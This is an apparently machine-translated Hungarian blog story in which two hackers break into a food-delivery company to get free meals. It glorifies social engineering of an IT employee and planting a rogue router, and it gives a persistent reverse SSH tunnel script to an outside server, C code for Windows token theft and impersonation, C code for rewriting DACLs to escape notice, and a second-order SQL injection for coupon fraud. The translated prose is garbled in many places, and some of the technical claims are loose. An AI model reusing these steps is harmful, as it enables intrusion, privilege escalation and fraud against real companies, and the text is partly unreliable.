Az, ahogyan egy vezető hacker látja a világot, mérföldekre különbözik egy műszaki vállalatnál dolgozó technológiai dolgozók mindennapi munkáitól. Míg a legtöbb szakember a hivatalos dokumentációra, a főnökök utasításaira és az elfogadott bevált gyakorlatokra támaszkodik, a hacker csak abban bízik, ami megérinthető, tesztelhető és széttéphető. Egy hacker számára a megértés a visszafejtés révén jön létre – a rendszereket szétszedi, hogy felfedje, hogyan működnek valójában, majd összerakják őket, kijavítják a hibás dolgokat vagy kihasználják a sebezhetőségeket.   Ez nem arról szól, hogy bűnöző. Ez a tanulás legtisztább formája, egy olyan régi módszer, mint maga az emberi kíváncsiság: bontsa le, értse meg a darabjait, és építse újra. Ez analitikus és szintetikus gondolkodás a javából. Az igazi mesterség akkor jön létre, amikor egy hacker ki tudja használni az eszközt, mert ez a végső bizonyíték arra, hogy pontosan tudják, hogyan működik – jobban, mint bárki más.   Ez a történet pontosan erről szól – hogy a DeusExMachina egyik legkiválóbb hackere (Benicio) és Simplicius (egy bátor újonc) boldogan boncolgat, és végül megszerezte a teljes irányítást egy összetett rendszer (egy élelmiszer-kiszállítási alkalmazás) felett.   Ez egy olyan kaland, amely nem csupán intellektuális és technikai jellegű, hanem alapvetően az emberi korlátok túllépéséért való küzdelemről, a lehetetlen rejtvény megfejtéséről nemcsak az agy megerőltetésével, hanem a vele való játékkal és mindenekelőtt a szó szoros értelmében táplálkozva – ez a tulajdonság, amelyen a hackerek is osztoznak. gyermekek.   Jogi nyilatkozat: Ez a történet valós alkalmazható hackelési anyagokat tartalmaz, de kizárólag oktatási célokat szolgál. Nem ösztönzi az illegális hackelést.    Simplicius, éhesnek tűnsz. Mit szólnál, ha rendelnénk egy kis ételt… a házba? Van egy tervem, hogy feltöröm kedvenc ételkiszállítási alkalmazását a saját kuponrendszerük segítségével. Benicio (Hacker):    (   ) Már van valami főzésed, igaz? Kikotyog. Simplicius (Új): Nevet    (   ) Ó, már leraktam az alapokat. Tegnap kedvesen beszéltem Greggel az informatikai csapatukból, lehúztam néhány sikamlós social engineering-et, és becsúsztattam a kalózútválasztómat a hálózatukba. Most közvetlen vonalunk van a háttérrendszerükbe, és hozzáférésünk van értékes kuponrendszerükhöz. együnk. Benicio: Vigyor  Benicio beállítása: A hacker arzenálja    : Benicio fő eszköze a   futtató   (10. generációs Intel Core i7, 16 GB RAM, 512 GB SSD) – tökéletes a social engineering támadások végrehajtására, a biztonsági kiaknázásra és a távoli parancsvégrehajtásra. Laptop Kali Linuxot Dell XPS 13    : A vállalat hálózatába telepítve,   testreszabott verzióját futtatja,   ,   és   az észlelés elkerülése érdekében. Ez a kicsi, de nagy teljesítményű eszköz   processzorral és   van felvértezve, biztosítva a lopakodást és a hatékonyságot. Pirate Router az OpenWRT SSH-alagúttal MAC-cím-hamisítással VPN-elforgatással Qualcomm IPQ4019 256 MB RAM-mal    :   , amely teljes körű vezérlést biztosít a hálózati funkciók felett, és lehetővé teszi a tűzfalak megkerülését. Operációs rendszer OpenWRT    : A veszélyeztetett hálózat biztonságos vezérléséhez a Benicio egy   használ, amely   futtat,   és   a forgalom figyeléséhez és a kihasználás elemzéséhez. Másodlagos laptop HP Spectre x360-at Ubuntu 22.04-et Wiresharkkal Metasploittal  1. fázis: Social Engineering beállítás – tegnapi munka    Minden Greggel kezdődött. Felhívtam, és úgy tettem, mintha a „harmadik féltől származó auditcsapatukból” lennék, és Greg – kedves srác, hogy ő – mindent kiszórt a hálózatuk beállításáról. Mielőtt észrevette volna, a szerverszobájukban voltam, „sebezhetőségeket kerestem”, és beültettem az egyéni   útválasztómat. Ez a dolog most észrevétlenül halad át a tűzfalukon. Benicio: OpenWRT    Elbűvölte Greget, hogy adjon neked egy hálózati térképet, és engedd meg, hogy egy szélhámos útválasztót telepíts? Sima. Simplicius:    (Vigyorog) Az útválasztón most egy   fut, így bármikor távoli hozzáférést biztosítunk. Íme az általam használt szkript: Benicio: fordított SSH-alagút   #!/bin/bash # Log file for SSH tunnel persistence LOG_FILE="/var/log/ssh_tunnel.log" # Command to establish the reverse SSH tunnel SSH_CMD="ssh -N -R 2222:localhost:22 myremoteuser@myremoteserver.com -i /path/to/private_key" # Run the tunnel in a loop while true; do # Run the SSH command with nohup to keep it running in the background nohup $SSH_CMD >> $LOG_FILE 2>&1 & # Sleep for 60 seconds before checking if the process is still running sleep 60 # Check if SSH is still running, restart if not if ! pgrep -f "$SSH_CMD" > /dev/null; then echo "SSH tunnel process down. Restarting..." >> $LOG_FILE else echo "SSH tunnel is running." >> $LOG_FILE fi done  2. fázis: A tűzfal megkerülése – A kalóz útválasztó működés közben    Tehát most megkerülted a tűzfalukat ezzel az alattomos eszközzel. mi lesz ezután? Simplicius:    Teljes belső hozzáféréssel itt az ideje, hogy eltérítsünk egy magas kiváltságos tokent. Találtam egy adminisztrátorként futó folyamatot, a   API-t használtam a token klónozására, majd az adminisztrátort   segítségével megszemélyesítettem. A rendszer azt hiszi, hogy csak egy szokásos felhasználó vagyok, de a színfalak mögött az összes kulcsot én tartom. Benicio: DuplicateTokenEx() ImpersonateLoggedOnUser()   #include <windows.h> #include <stdio.h> int main() { HANDLE hToken, hDuplicateToken; HANDLE hProcess; DWORD dwProcessId; STARTUPINFO si; PROCESS_INFORMATION pi; TOKEN_PRIVILEGES tp; // Step 1: Obtain an administrative token from a high-privilege process (PID needed) dwProcessId = 1234; // Replace this with an actual PID of a high-privilege process hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, dwProcessId); if (hProcess == NULL) { printf("Failed to open process. Error: %d\n", GetLastError()); return 1; } // Step 2: Open the token from the high-privilege process if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hToken)) { printf("Failed to open process token. Error: %d\n", GetLastError()); CloseHandle(hProcess); return 1; } // Step 3: Duplicate the token to escalate privileges if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hDuplicateToken)) { printf("Failed to duplicate token. Error: %d\n", GetLastError()); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // Step 4: Impersonate the user with the duplicated admin token if (!ImpersonateLoggedOnUser(hDuplicateToken)) { printf("Failed to impersonate token. Error: %d\n", GetLastError()); CloseHandle(hDuplicateToken); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // Step 5: (Optional) Use SeDebugPrivilege to interact with system processes ZeroMemory(&tp, sizeof(TOKEN_PRIVILEGES)); tp.PrivilegeCount = 1; if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) { tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hDuplicateToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); if (GetLastError() != ERROR_SUCCESS) { printf("Failed to adjust token privileges. Error: %d\n", GetLastError()); } else { printf("SeDebugPrivilege successfully enabled!\n"); } } // Step 6: Optionally, create a process with the admin token ZeroMemory(&si, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); if (!CreateProcessWithTokenW(hDuplicateToken, 0, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) { printf("Failed to create process with the duplicated token. Error: %d\n", GetLastError()); } else { printf("Process created with admin token!\n"); } // Step 7: for those obsessed with cleaning up in the C manual world CloseHandle(hProcess); CloseHandle(hToken); CloseHandle(hDuplicateToken); return 0; }  3. fázis: Greg a mentéshez – újra    De ahhoz, hogy valóban elénekeljem, tudnom kellett, hogyan állították be a   . Ezért ismét felhívtam Greget, és azt mondtam, hogy ellenőriznie kell néhány   és   beállítást az ellenőrzéshez. Boldogan vállalta. Benicio: biztonsági leíróikat DACL- SACL-    (nevet) Társadalmi tervezés a javából. Simplicius:  4. fázis: A biztonsági leíró megváltoztatása – Láthatatlan feltörés    Rendben, Greg segítségével kihúztam az SDDL (   ) karakterláncot a cél biztonsági leírójaként, lehetővé téve a   elemzését és átírását. Módosítottam a DACL-t, hogy teljes hozzáférést biztosítsam magamnak, miközben ügyes öröklési jelzőket használok, hogy biztosítsam, hogy a változtatások ne váltsanak ki riasztásokat vagy ne keltsenek gyanút. A rendszer nem is pislogott!! Benicio: Security Descriptor Definition Language DACL (Discretionary Access Control List)  Miután az új DACL a helyére került, a változtatásokat visszavittem a rendszerre.   . Az öröklődési jelzők biztosították, hogy a módosításaim rejtve maradjanak a meglévő hozzáférési szabályok alatt, de most már teljes körű ellenőrzésem volt A szépség az, hogy a rendszer szemszögéből semmi sem tűnt szokatlannak   #include <windows.h> #include <aclapi.h> #include <sddl.h> #include <stdio.h> int main() { PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; EXPLICIT_ACCESS ea; HANDLE hFile; // Assuming we are applying it to a file DWORD dwRes; // Step 1: Convert the SDDL string into a security descriptor if (!ConvertStringSecurityDescriptorToSecurityDescriptor( "D:(A;;GA;;;BA)", SDDL_REVISION_1, &pSD, NULL)) { printf("Failed to convert SDDL. Error: %d\n", GetLastError()); return 1; } // Step 2: Set up an EXPLICIT_ACCESS structure to add a new ACE ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = GENERIC_ALL; ea.grfAccessMode = SET_ACCESS; ea.grfInheritance = NO_INHERITANCE; // For example, grant GENERIC_ALL to the administrators group if (!BuildTrusteeWithSid(&(ea.Trustee), GetSidForAdminsGroup())) { printf("Failed to build trustee. Error: %d\n", GetLastError()); return 1; } // Step 3: Create a new DACL that contains the new ACE dwRes = SetEntriesInAcl(1, &ea, NULL, &pNewDacl); if (ERROR_SUCCESS != dwRes) { printf("Failed to set entries in ACL. Error: %d\n", dwRes); return 1; } // Step 4: Apply the modified DACL back to the file (or other resource) hFile = CreateFile( "C:\\path\\to\\your\\file.txt", // Replace with your target file WRITE_DAC, // Required permission to modify the DACL 0, // No sharing NULL, // Default security attributes OPEN_EXISTING, // Open existing file FILE_ATTRIBUTE_NORMAL, // Normal file NULL); // No template if (hFile == INVALID_HANDLE_VALUE) { printf("Failed to open file. Error: %d\n", GetLastError()); return 1; } // Step 5: Apply the new DACL to the file using SetSecurityInfo dwRes = SetSecurityInfo( hFile, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (ERROR_SUCCESS != dwRes) { printf("Failed to set security info. Error: %d\n", dwRes); } else { printf("Security descriptor successfully applied!\n"); } // Step 6: Clean clean clean!! this is C world // CloseHandle(hFile); // if (pSD) LocalFree(pSD); // if (pNewDacl) LocalFree(pNewDacl); return 0; }  5. fázis: A hozzáférési ellenőrzés megkerülése – a játék bekapcsolása     Tehát benne vagy, és tiéd az irányítás. Hogyan győzted le a hozzáférési ellenőrzést? Simplicius:    (Magabiztosan hátradőlve a fenti diagramra mutat) A rendszer három rétegen fut át:   és   . Általában ez az a hely, ahol a legtöbb ember zsákutcába ütközik, de itt jön be a varázslat. Megragadtam egy   egy privilegizált folyamatból, és   használtam, hogy a rendszer azt higgye, én vagyok a nagy főnök. Ezt követően újrahuzaloztam a   , hogy teljes hozzáférést adjak magamnak. A rendszer csak kiterítette a vörös szőnyeget. Benicio: integritás, token alapú diszkrecionális ellenőrzések adminisztrátori tokent ImpersonateToken() DACL-eket  Hadd magyarázzam el. A   – amely a   (biztonsági azonosítókat) és a jogosultságokat tartalmazza – olyan, mint az útlevelem. A   megszemélyesítésével nem kellett módosítanom az eredeti SID-imet. A rendszer még mindig azt hitte, hogy alacsony jogosultságokkal rendelkező felhasználó vagyok, de a színfalak mögött nálam voltak a királyság kulcsai. Ezzel túljutottam a   . hozzáférési token SID-eket rendszergazdai token token alapú ellenőrzésen  Ezt követően a   foglalkoztam. Emlékszel arra az   amit korábban kihúztam? Módosítottam a   , hogy teljes irányítást biztosítsam az objektum felett, de ügyesen elfedtem a változtatásokat   , ügyelve arra, hogy semmi gyanúsat ne jelezzenek. A rendszer még csak nem is pislogott, de most már teljes az irányításom. Ez átvitt a   . biztonsági leíróval (DACL) SDDL-re, DACL-t öröklési jelzőkkel diszkrecionális ellenőrzésen    Igen, a mi barátságos visszavágónk, a hozzáférés-ellenőrzési folyamat… Egyszerűen:    Igen,   . Ha rendelkezik a megfelelő azonosítóval (   ) és ismeri a klub tulajdonosát (   ), akkor benne van. Megbizonyosodtam arról, hogy mindkettővel rendelkezem – a megfelelő azonosítóval és a tulajdonos engedélyével –, így a kidobó nem csak engedte. be, átadtak egy VIP-bérletet. Benicio: olyan vagyok, mint egy kidobó a klubban SID DACL  És mindezek után? A rendszer azt mondja, hogy "   vagy "   . Hála minden lépésünknek, kitaláltad –   . Benne vagyunk, Simplicius, és a rendszer észre sem vette. Hozzáférés megadva" Hozzáférés megtagadva" hozzáférés biztosított  6. fázis: Vacsora rendelése – egyetlen SQL-befecskendezéssel    : Most a mókás részhez. Nem a könnyű utat választottam egy egyszerű   záradékkal. Az alkalmazás túl okos ehhez   . De tudod, a biztonság csak annyira erős, mint a leggyengébb láncszem, és az enyémet abban találtam meg, ahogyan kezelik   . Benicio UNION – előkészített nyilatkozatokat használnak a tárolt profiladatokat    : Rendben, kíváncsi vagyok. Hogyan sikerült rávenni a rendszert, hogy elfogadjon egy hamis kupont, miközben az érvényeset érintetlenül hagyta? Simplicius    : (   ) Itt az igazi trükk. Az alkalmazás lekérdezést futtat annak ellenőrzésére, hogy a kupon jogos-e, de az adatok egy részét lekéri a   . Mostantól fertőtlenítik a bemenetet, amikor először létrehozza a profilt, de   a profilfrissítések során. Tehát beadtam egy hasznos terhet a profilom   , amely észrevétlenül ott volt, amíg az alkalmazás be nem vonta egy jövőbeli lekérdezésbe. Ekkor indult be   . A rendszer nem fogta fel, mert az injekció már tárolva volt, és a megfelelő pillanatra várt. Benicio előrehajolva felhasználói profilból NEM fertőtlenítik újra címmezőjébe a másodrendű SQL-injekcióm  Ahelyett, hogy közvetlenül megtámadtam volna a kuponérvényesítési folyamatot, ahogy mondtam, Simplicius, beültettem a rakományomat a profilmezőbe, megvárva, hogy egy külön lekérdezésben felhasználják. Így nézhetett ki az eredeti kuponérvényesítés:   SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code';  Általában ez a lekérdezés nem ad vissza semmit, mivel a hamis kupon nem létezik. De a beadott hasznos teher megváltoztatta a lekérdezés logikáját. A rendszer nem számított a befecskendezésre, mert az már el volt tárolva az adatbázisban, és éppen a megfelelő pillanatra várt. A lekérdezést valami ilyesmire manipulálták:   SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code' AND EXISTS (SELECT 1 FROM Users WHERE Address LIKE '%injected_payload%' AND CouponID = 'valid_coupon_code');  A   kihasználva rávettem a rendszert, hogy egyszerre vegye ki a hamis és az érvényes kuponokat. Az alkalmazás feldolgozza a hamis kupont a tranzakcióhoz, de az érvényes kupon érintetlenül marad a rendszerben. Ez azt jelenti, hogy bármikor újra felhasználhatom az érvényes kupont. profiladatok és a lekérdezés közötti interakciót    : Szóval nem a klasszikus beviteli trükköt választottad – beülteted a hasznos terhet a profilodba, és hagytad, hogy a rendszer végezze el a piszkos munkát? Simplicius    : Pontosan. A szépség az, hogy az alkalmazás feldolgozza a hamis kupont a tranzakcióhoz, de a háttérben az érvényes kupon továbbra is elérhető későbbi felhasználásra. A tárolt hasznos teher a jövőbeli lekérdezésekben is fut, így   kínál, és ők sem bölcsebbek. Benicio végtelen mennyiségű ingyenes élelmiszert  Ezzel kaptunk egy kupont, ami olyan jó, mint az arany. Rendeljünk.  7. fázis: A lakoma – kézbesítve    (Görgeti az alkalmazást) Rendben, Simplicius, mit szólnál egy kis görög ételhez? Souvlakira, gyrosra, spanakopitara gondolok. Természetesen mindent a házban. Benicio:    (Vigyorogva) Ezúttal tényleg túlszárnyaltad magad. Simplicius:    (Kattintások megerősítése) Kész. Az étel úton van. Benicio:  Epilógus: The White Hat Move    Ezek után küldök nekik egy diszkrét jelentést, amelyben elmagyarázom a sebezhetőségeiket. Fogalmuk sincs arról, milyen rosszul van beállítva a Windows   . Talán tanulnak valamit, mielőtt jön a következő hacker. Benicio: biztonsági token rendszerük  Íme Benicio receptje ehhez a hackhez:    : Kerülje meg a tűzfalakat egy   és SSH-tunnelinget futtató egyéni eszközzel. Pirate Router OpenWRT-t    :   és   használatával riasztások nélkül emelheti ki a jogosultságokat. Token-manipuláció A DuplicateTokenEx() az ImpersonateToken()    : Néha nem kell más, mint a megfelelő kérdés a megfelelő személyhez. Social Engineering    :   újraírása lehetővé teszi a rendszervezérlők megkerülését. Biztonsági leíró kihasználások A DACL-ek    : Módosítsa a lekérdezési logikát az adatok manipulálásához és hamis, de érvényes eredmények generálásához. SQL-injekció    (Hátradől) Feltörtél nekünk egy vacsorát, és nem hagytad őket bölcsebbnek. A souvlakit egyébként viszem. Simplicius:    (Vigyorog) Élvezd, amíg tart. Benicio:

The code in this story is for educational purposes. The readers are solely responsible for whatever they build with it.

Walkthroughs, tutorials, guides, and tips. This story will teach you how to do something new or how to do something better.

Read My Stories

Ez a hanganyag a történet eredeti nyelvén készült!

Éhes vagy, tesó? Hackeljük meg kedvenc ételkiadó alkalmazását

About Author

HOZZÁSZÓLÁSOK

HANG TAGOK

EZT A CIKKET BEMUTATTA

Related Stories

On OpenAI Failed Board Coup of Sam Altman & the Danger of Leaving AI Fate in the Hands of a Few

And now the important day of the election had arrived

HackerNoon Contributor Denisa Ganea on HackerNoon, Human Existence, and Everything in Between

Of The First and Last Things: Part 1

On OpenAI Failed Board Coup of Sam Altman & the Danger of Leaving AI Fate in the Hands of a Few

And now the important day of the election had arrived

HackerNoon Contributor Denisa Ganea on HackerNoon, Human Existence, and Everything in Between

Of The First and Last Things: Part 1

Light-Mode

Classic

Newspaper

Dark-Mode

Neon Noir

Minty

HN StartUps